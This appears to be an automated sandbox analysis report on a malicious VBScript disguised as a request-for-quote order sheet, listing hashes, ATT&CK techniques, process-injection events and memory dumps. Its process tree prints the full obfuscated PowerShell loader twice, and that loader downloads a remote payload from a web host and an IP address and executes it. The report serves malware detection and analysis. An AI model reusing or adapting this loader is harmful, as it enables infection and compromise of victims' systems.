66c26fbf2a4e3405e7ae29b67046bacbf2318e6b81c3aaa0599b7e716c606a98

General

Target

rfq_new_order_sheet_2024_PO_NoRZODOSKY00000.vbs
Size

18KB
MD5

87982f1f940cc4ad215ce2dd3fe45678
SHA1

ab69b4663d660eefd6bae607b5f471761c90d934
SHA256

05f0ff8b8b6a8040947d1e42e4dc6ee89b109634afbd957279a36f758f33067a
SHA512

b1663c1a95eadd5b4d083a93bc39c79e3755b2502b365a1dd6370d896718f3ef89a70301741ffecc9e604d02b95c81e77b22dab9360807bd7a2a4941c20d92d9
SSDEEP

192:GAARWxC3Mebmv9g9njInwpBWLXajbv3IzOru9Uf+lpsYrIwR2+DC1otzeeoreNh6:GxCC3MebmliBRbAOcpsmD8NvWaJnEcv

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4800	powershell.exe
4800	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4800	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 3880 wrote to memory of 4800	3880	WScript.exe	104
PID 3880 wrote to memory of 4800	3880	WScript.exe	104
PID 4800 wrote to memory of 2488	4800	powershell.exe	109
PID 4800 wrote to memory of 2488	4800	powershell.exe	109
PID 4800 wrote to memory of 1436	4800	powershell.exe	112
PID 4800 wrote to memory of 1436	4800	powershell.exe	112
PID 4800 wrote to memory of 1436	4800	powershell.exe	112

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rfq_new_order_sheet_2024_PO_NoRZODOSKY00000.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Clear-History;Clear-History;Function Euphono ([String]$Comp){$Affotogra = 5;For($Hypaxials=4; $Hypaxials -lt $Comp.Length-1; $Hypaxials+=$Affotogra){ $Crest4 = $Comp.Substring($Hypaxials, $brst); $Crest=$Crest+$Crest4; }$Crest;}$brst = (cmd /c 'echo 1 && exit');$Crest01=Euphono 'SvreiGeareCroaxPulv ';$Crest02=Euphono ' RawTKonfr ArbaAutan IchsJumbfveileAbekr AgmrChloiNatlnRecigHaan ';$Opre = Euphono 'Eksp\SegosClatyOversMajowSquioTurnwProt6Righ4Topp\KhedWLivgi SpunChard KonoExliwUbevs RadPrykkoRubbwCommeAlcorHockSFirehBsseeSkyfl Hydlenja\ PrevForh1Dysm.Pers0Peri\InfopSkruo TriwVarmeTotarAsiasUdsmh Newe KnolTakslOchr. Pale RimxErkleStat ';function Deall ($Udstykni){.($Crest01) ($Udstykni);}$Androcle=Euphono ' Deah Nobt SoftKasspCrev:Smaa/Card/slagkAarbeBosenUnfacFlowhUnipaSaccn HovoDemif PlafUtmmi DiscGangeNonc.DmtenRenoeRejmtBrug/BronwRaspoMororuncidMelipTumir GaneEnfasAfrusSchi/MaalwAmbrpPrim-retramokkdnedtmprewi VinnStri/ AbauUdsas Sese Mirr Reh/ BesmEtkalTegn/SkdeR SuiePurigSkden IntvFarteUopsjKogt8Nord1Opsp.PrempBrocr HeemRotv>Subuh LyntLvogtsafrp Ans: Ove/Meld/Sade8Tard5 Fre. Sta2Taal0Orci9Bane. Hyp1Impr7Stjk6 Sma.Vans4Over6Admi/RnebRinpueFabrgDupenInfevAktie Vitjmili8Over1Hear.SignpvandrBeodmBnkn ';$Noncon=$Androcle.split([char]62);$Androcle=$Noncon[0];Deall (Euphono ' Bre$ InvgEncelFabro BalbOpfraAppelOver: VicKMucooBesvnUroefGlovibrem2Teat=Salt$Monke SkunkofevSigf: EulwUnpaiChronPlexdGsteiHorsrLamm ') ;Deall (Euphono 'Hutl$UbetgKoorlLarko LilbCoyoacounl Hom:PoliKOranoUrimnSulpfCalai Dip6 Fra=Phon$UlviKstifoPapinSubnfLovoiFors2Fodb+Dipl$SwadOEjlepHashrPosseFugl ') ;Deall (Euphono 'Borg$KosmgHittlAnskoVormbDummaTonellock:HaugKIchnoSakknReapfCantiRovs3 Mar Tarv=Down Pos(Nowe( Glyg FrewPersm OmriWelt MddiwEksii PhonHnde3Pyri2Hall_Aflep Udsr skroIchncJocueMontsPhots lan Pros-SkorFDrmm DynP AutrSmeroNeglcKafieCents AppsDrifIMesodStil=bana$Link{ nonP XerIMyroDMacr} Mou)Spil.JourC ObiotrafmtjanmScolaParanRefldUsynLKurai OutnKvlseBlom)Kost Band-Dyscs MalpReculFodbi KretTime Spo[PseucRadihquaraRomerPrci] Gnu3Konf4Krig ');Deall (Euphono 'Scho$ Facg PollEyesoJaunbSnuea Magl nav:flyvK FlyoklernAnslfOpfaiPseu4Bron Carb= Aan Hast$NeosK Rego MarnArtiftarmiKefi3Sokk[Unpe$EthyKKlimoAdennGarafPsfsiSaml3Preu.TidecExtroVelduReedntordtRear-Pred2 Spa]Nonr ');Deall (Euphono 'Exte$Jelag KvslChreoSkrobDivua SynlRump:InteKOrtoo CornSprifDeriiSyds5Blin=Semi(lumsTLitheHipps Spat Mon-SstnP SkoaEntitThrehTold Pred$ KlaKGengoScrinAntafNormiOper6Step)Veno Barn-EpicAAmmenenevdMadr Cupr(Loft[KyniIHalbnKulstblinPUndetMalarcour]Frak:Afsk: AnnsReneiKrepz BageHalt Unes-KeraeDunjq Bes Prot8 Sam)Opsa ') ;if ($Konfi5) {. $Konfi6 $Konfi4;} else {;$Crest00=Euphono 'Plan$BankgDisalmusioHydrbModsaMetalData:alexKSpugoAffrnChecfLykkiProp8Veds Mave=Brod FrygS yontTrykaIncorAdeltPlse-TernB Asbi VantunfesHalvTUnglrPredawoodnFoghsAdumf Ente BrerStrk velv- StaSFabaoOmkruPachrPostcSigje Ska Pres$KuglA facn GaldDecerKecio ReacAmtsl PaseRegi Driv- SmoDStrueXenosVejotBegyiAgain Woma FortWheliHumioVoldnFaun Rund$NyheKEarwoAflynuniof Meriuniv2Dist ';Deall (Euphono 'Bleg$VissgUnrelSystoStnnbTastaimidlInfl:MariK BraoHalvnReshfMindiUgal2Artl= Kio$HeteeFnysnTeddv Tar:Klisa UngpGlampEksidSpilaMonot HavaBueg ') ;Deall (Euphono 'CollIChlomchorpGrosoUngdrEdentRapp- OmsMSarco SkidAntiu TinlBarreBurg GeoBEdsfiAccotVanasBandTPrisrBootaPajenFeedsBendf Newe BedrUnsl ') ;$Konfi2=$Konfi2+'\Oxycephalo.Usk' ;Deall (Euphono 'Dall$AfpagFaldl AnkoSuspbEthaaSagflBumm: UsvKSelvoAttenCerif FiniRben7Tcha=Auto(fiksTMemoeIdeas TaatJust-IndfPBetjaDetatMorahKlim Hjlp$ UdvK IsooMiscnUnsef Prei Gna2pozz) Non ') ;while (-not $Konfi7) {Deall (Euphono 'KnkbIFotof Con Dom( Beh$StulKForlo SkrnAftefFunciKeno8Trus. KorJRerioAminbSadeSForbtPumma IndtDieseFlje str-FiloeSporqTale Skyg$StipC StrrAlbueForbsbradtHono0Mede2 Int)Viad Kery{UdbySSplit PseaLaryrStrat Sem-SeleSSyndlUndeeTagpefjorpFron Ekse1Filt}UncoeDdsslApprscenteKont{BeleSTrivtSprea FesrsimutProc-dracSconglDetreHeroeCleip Sus Bek1Brne;IneqDMglieOnocaBenil FaglBudg Che$PrinCDeper BibeGimps Espt Per0Agei0Aero} Cor ');Deall (Euphono 'Gall$ Baag DellTackoFibrbAuktaUnfilHarr:ElboKGrano AntnAcadfHelmi mis7 Skr=Besk( RejT ReseAbuns DrvtLord-DropPArbeaDanntSkrihFerm Thre$TipoK FlaoEsajnChikf NauiAlne2 Dar)Hurt ') ;$Androcle=$Noncon[$Tricarboxy++%$Noncon.count];}Deall (Euphono 'Uncl$RebugSolml BruoTenobvigeaForslOnyx:TudeCDalbeEuphpProcsVivdtSuberRemeuunmamFert Bur=Taph AdvoGFimseBaistCorn-IndrC KreoSupenUnobtNsine BennHydrtObla Micr$ udsK HedoSuitnMonofTredi Cam2Zygn ');Deall (Euphono 'Rets$StevgBowdlUninoKnalbDiffaTheolPath:NihiKAbornafstaAnticHarrkSrmr Wron= Cap Dian[OutgSShenySnips GtetBleaeDecamEvig.AlgiC Addo Biln Bisv CareCafkrOvertAsse]Pugi:Efte: OstFAnverAfstoBlinm BisBAfpraalphs DigeRisf6Stan4AfteSStretAlierAeoniMisnnHjssgTher( Mar$VoldCprepe Disp SynsHeavtSerirDionuKogemSoci)Viki ');Deall (Euphono 'Laur$BestgProdlKlamo Phybunbla GrilUnim:SigvCScorrReceeEnersNagmtAbro2Raad Stan=Argy Rute[stenS DipyCrotsMavetUnsheUndlmLore. SquTStreeDegaxSount Ink.LapsECystnAnercudlbo TkkdUntaiSkurnSpecgSprh]Grat:Sylp:TaboAWifeSFredCRingIForsI Equ.ReshGNegoeExittSiamSPidjtInterStomiNonin SupgBequ(Paga$EkstKUndennitraHamscKainkCamp)Mcle ');Deall (Euphono 'Dens$ CoegFasalundeo FejbwalpaTranlObje:ElorCCastrcogiecirks Afrt Qui3Holo=Beta$roseC StirLamie SlasPanptTilo2Verr.ChrosDecau EphbsecosVicetLillrRneniSaxinEulogMerc(Kphj2 Bor5Swal4Slot7 Hel4 Non9Over,Hypo1Snot9Eksp9Noni1 ove2Call)Forb ');Deall $Crest3;};;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4800
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo 1 && exit"
    3⤵
    PID:2488
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Clear-History;Clear-History;Function Euphono ([String]$Comp){$Affotogra = 5;For($Hypaxials=4; $Hypaxials -lt $Comp.Length-1; $Hypaxials+=$Affotogra){ $Crest4 = $Comp.Substring($Hypaxials, $brst); $Crest=$Crest+$Crest4; }$Crest;}$brst = (cmd /c 'echo 1 && exit');$Crest01=Euphono 'SvreiGeareCroaxPulv ';$Crest02=Euphono ' RawTKonfr ArbaAutan IchsJumbfveileAbekr AgmrChloiNatlnRecigHaan ';$Opre = Euphono 'Eksp\SegosClatyOversMajowSquioTurnwProt6Righ4Topp\KhedWLivgi SpunChard KonoExliwUbevs RadPrykkoRubbwCommeAlcorHockSFirehBsseeSkyfl Hydlenja\ PrevForh1Dysm.Pers0Peri\InfopSkruo TriwVarmeTotarAsiasUdsmh Newe KnolTakslOchr. Pale RimxErkleStat ';function Deall ($Udstykni){.($Crest01) ($Udstykni);}$Androcle=Euphono ' Deah Nobt SoftKasspCrev:Smaa/Card/slagkAarbeBosenUnfacFlowhUnipaSaccn HovoDemif PlafUtmmi DiscGangeNonc.DmtenRenoeRejmtBrug/BronwRaspoMororuncidMelipTumir GaneEnfasAfrusSchi/MaalwAmbrpPrim-retramokkdnedtmprewi VinnStri/ AbauUdsas Sese Mirr Reh/ BesmEtkalTegn/SkdeR SuiePurigSkden IntvFarteUopsjKogt8Nord1Opsp.PrempBrocr HeemRotv>Subuh LyntLvogtsafrp Ans: Ove/Meld/Sade8Tard5 Fre. Sta2Taal0Orci9Bane. Hyp1Impr7Stjk6 Sma.Vans4Over6Admi/RnebRinpueFabrgDupenInfevAktie Vitjmili8Over1Hear.SignpvandrBeodmBnkn ';$Noncon=$Androcle.split([char]62);$Androcle=$Noncon[0];Deall (Euphono ' Bre$ InvgEncelFabro BalbOpfraAppelOver: VicKMucooBesvnUroefGlovibrem2Teat=Salt$Monke SkunkofevSigf: EulwUnpaiChronPlexdGsteiHorsrLamm ') ;Deall (Euphono 'Hutl$UbetgKoorlLarko LilbCoyoacounl Hom:PoliKOranoUrimnSulpfCalai Dip6 Fra=Phon$UlviKstifoPapinSubnfLovoiFors2Fodb+Dipl$SwadOEjlepHashrPosseFugl ') ;Deall (Euphono 'Borg$KosmgHittlAnskoVormbDummaTonellock:HaugKIchnoSakknReapfCantiRovs3 Mar Tarv=Down Pos(Nowe( Glyg FrewPersm OmriWelt MddiwEksii PhonHnde3Pyri2Hall_Aflep Udsr skroIchncJocueMontsPhots lan Pros-SkorFDrmm DynP AutrSmeroNeglcKafieCents AppsDrifIMesodStil=bana$Link{ nonP XerIMyroDMacr} Mou)Spil.JourC ObiotrafmtjanmScolaParanRefldUsynLKurai OutnKvlseBlom)Kost Band-Dyscs MalpReculFodbi KretTime Spo[PseucRadihquaraRomerPrci] Gnu3Konf4Krig ');Deall (Euphono 'Scho$ Facg PollEyesoJaunbSnuea Magl nav:flyvK FlyoklernAnslfOpfaiPseu4Bron Carb= Aan Hast$NeosK Rego MarnArtiftarmiKefi3Sokk[Unpe$EthyKKlimoAdennGarafPsfsiSaml3Preu.TidecExtroVelduReedntordtRear-Pred2 Spa]Nonr ');Deall (Euphono 'Exte$Jelag KvslChreoSkrobDivua SynlRump:InteKOrtoo CornSprifDeriiSyds5Blin=Semi(lumsTLitheHipps Spat Mon-SstnP SkoaEntitThrehTold Pred$ KlaKGengoScrinAntafNormiOper6Step)Veno Barn-EpicAAmmenenevdMadr Cupr(Loft[KyniIHalbnKulstblinPUndetMalarcour]Frak:Afsk: AnnsReneiKrepz BageHalt Unes-KeraeDunjq Bes Prot8 Sam)Opsa ') ;if ($Konfi5) {. $Konfi6 $Konfi4;} else {;$Crest00=Euphono 'Plan$BankgDisalmusioHydrbModsaMetalData:alexKSpugoAffrnChecfLykkiProp8Veds Mave=Brod FrygS yontTrykaIncorAdeltPlse-TernB Asbi VantunfesHalvTUnglrPredawoodnFoghsAdumf Ente BrerStrk velv- StaSFabaoOmkruPachrPostcSigje Ska Pres$KuglA facn GaldDecerKecio ReacAmtsl PaseRegi Driv- SmoDStrueXenosVejotBegyiAgain Woma FortWheliHumioVoldnFaun Rund$NyheKEarwoAflynuniof Meriuniv2Dist ';Deall (Euphono 'Bleg$VissgUnrelSystoStnnbTastaimidlInfl:MariK BraoHalvnReshfMindiUgal2Artl= Kio$HeteeFnysnTeddv Tar:Klisa UngpGlampEksidSpilaMonot HavaBueg ') ;Deall (Euphono 'CollIChlomchorpGrosoUngdrEdentRapp- OmsMSarco SkidAntiu TinlBarreBurg GeoBEdsfiAccotVanasBandTPrisrBootaPajenFeedsBendf Newe BedrUnsl ') ;$Konfi2=$Konfi2+'\Oxycephalo.Usk' ;Deall (Euphono 'Dall$AfpagFaldl AnkoSuspbEthaaSagflBumm: UsvKSelvoAttenCerif FiniRben7Tcha=Auto(fiksTMemoeIdeas TaatJust-IndfPBetjaDetatMorahKlim Hjlp$ UdvK IsooMiscnUnsef Prei Gna2pozz) Non ') ;while (-not $Konfi7) {Deall (Euphono 'KnkbIFotof Con Dom( Beh$StulKForlo SkrnAftefFunciKeno8Trus. KorJRerioAminbSadeSForbtPumma IndtDieseFlje str-FiloeSporqTale Skyg$StipC StrrAlbueForbsbradtHono0Mede2 Int)Viad Kery{UdbySSplit PseaLaryrStrat Sem-SeleSSyndlUndeeTagpefjorpFron Ekse1Filt}UncoeDdsslApprscenteKont{BeleSTrivtSprea FesrsimutProc-dracSconglDetreHeroeCleip Sus Bek1Brne;IneqDMglieOnocaBenil FaglBudg Che$PrinCDeper BibeGimps Espt Per0Agei0Aero} Cor ');Deall (Euphono 'Gall$ Baag DellTackoFibrbAuktaUnfilHarr:ElboKGrano AntnAcadfHelmi mis7 Skr=Besk( RejT ReseAbuns DrvtLord-DropPArbeaDanntSkrihFerm Thre$TipoK FlaoEsajnChikf NauiAlne2 Dar)Hurt ') ;$Androcle=$Noncon[$Tricarboxy++%$Noncon.count];}Deall (Euphono 'Uncl$RebugSolml BruoTenobvigeaForslOnyx:TudeCDalbeEuphpProcsVivdtSuberRemeuunmamFert Bur=Taph AdvoGFimseBaistCorn-IndrC KreoSupenUnobtNsine BennHydrtObla Micr$ udsK HedoSuitnMonofTredi Cam2Zygn ');Deall (Euphono 'Rets$StevgBowdlUninoKnalbDiffaTheolPath:NihiKAbornafstaAnticHarrkSrmr Wron= Cap Dian[OutgSShenySnips GtetBleaeDecamEvig.AlgiC Addo Biln Bisv CareCafkrOvertAsse]Pugi:Efte: OstFAnverAfstoBlinm BisBAfpraalphs DigeRisf6Stan4AfteSStretAlierAeoniMisnnHjssgTher( Mar$VoldCprepe Disp SynsHeavtSerirDionuKogemSoci)Viki ');Deall (Euphono 'Laur$BestgProdlKlamo Phybunbla GrilUnim:SigvCScorrReceeEnersNagmtAbro2Raad Stan=Argy Rute[stenS DipyCrotsMavetUnsheUndlmLore. SquTStreeDegaxSount Ink.LapsECystnAnercudlbo TkkdUntaiSkurnSpecgSprh]Grat:Sylp:TaboAWifeSFredCRingIForsI Equ.ReshGNegoeExittSiamSPidjtInterStomiNonin SupgBequ(Paga$EkstKUndennitraHamscKainkCamp)Mcle ');Deall (Euphono 'Dens$ CoegFasalundeo FejbwalpaTranlObje:ElorCCastrcogiecirks Afrt Qui3Holo=Beta$roseC StirLamie SlasPanptTilo2Verr.ChrosDecau EphbsecosVicetLillrRneniSaxinEulogMerc(Kphj2 Bor5Swal4Slot7 Hel4 Non9Over,Hypo1Snot9Eksp9Noni1 ove2Call)Forb ');Deall $Crest3;};;"
    3⤵
    PID:1436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g2ejful0.oy3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4800-9-0x0000023612EF0000-0x0000023612F12000-memory.dmp

Filesize
136KB

Download
memory/4800-10-0x00007FF8C15A0000-0x00007FF8C2061000-memory.dmp

Filesize
10.8MB

Download
memory/4800-11-0x000002362B550000-0x000002362B560000-memory.dmp

Filesize
64KB

Download
memory/4800-12-0x00007FF8C15A0000-0x00007FF8C2061000-memory.dmp

Filesize
10.8MB

Download
memory/4800-13-0x000002362B550000-0x000002362B560000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing